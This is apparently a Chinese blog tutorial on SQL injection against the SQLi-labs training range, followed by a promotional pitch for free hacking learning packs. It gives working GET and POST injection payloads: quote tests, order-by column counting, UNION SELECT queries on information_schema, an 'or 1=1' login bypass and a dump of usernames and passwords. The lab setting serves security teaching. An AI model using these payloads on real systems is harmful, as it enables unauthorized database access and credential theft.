SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战!
前****言
SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战!
一、实战准备
安全测试靶场:SQLi-labs
工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具
二、SQL注入思路
1、判断是否存在SQL注入漏洞
2、猜解SQL查询语句中的字段数
3、获取当前数据库
4、获取数据库中的表
5、获取表中的字段名
6、获取指定字段的数据
三、SQL注入实战-Get场景
进入SQLi-labs的Less-1关,输入id的值
1、id=1’ ,发起请求,返回SQL语法错误
2、id = 1’–+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞
3、判断当前表的字段数
select * from users where id=‘1’ order by 1; 该语句中order by 1为按第1列的数据进行排序。
输入 id=1’ order by 3 #,回显数据正常,表示当前查询表存在第3列数据。
输入 id=1’ order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!
4、获取数据库库名
使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。
id=’ union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。
5、获取数据库的表名
id=’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ #;获取到security库的所有表名。
6、获取表中的字段名
id=’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ #;其中,如果不支持’users’单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。
7、获取表中需要的数据
id=’ union select 1,2,group_concat(concat_ws(‘~’,username,password)) from security.users #;
可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。
四、SQL注入实战-POST场景
进入SQLi-labs的Less-11关,输入Username、Password。
1、判断是否存在sql注入漏洞
在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。
直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。
2、判断当前查询表的字段数
通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:
在burpsuite中分别修改数据,进行后续步骤的操作:
uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。
3、获取当前数据库名
uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。
4、获取当前数据库下的表名
uname=a’ union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=‘security’)# &passwd=a&submit=Submit可以得到security数据库中所有的表信息
5、获取表中字段名
uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password
6、获取表中数据
uname=a%27 union select 1,group_concat(concat_ws(‘~’,username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。
当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!
学无止境,行以致远!
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取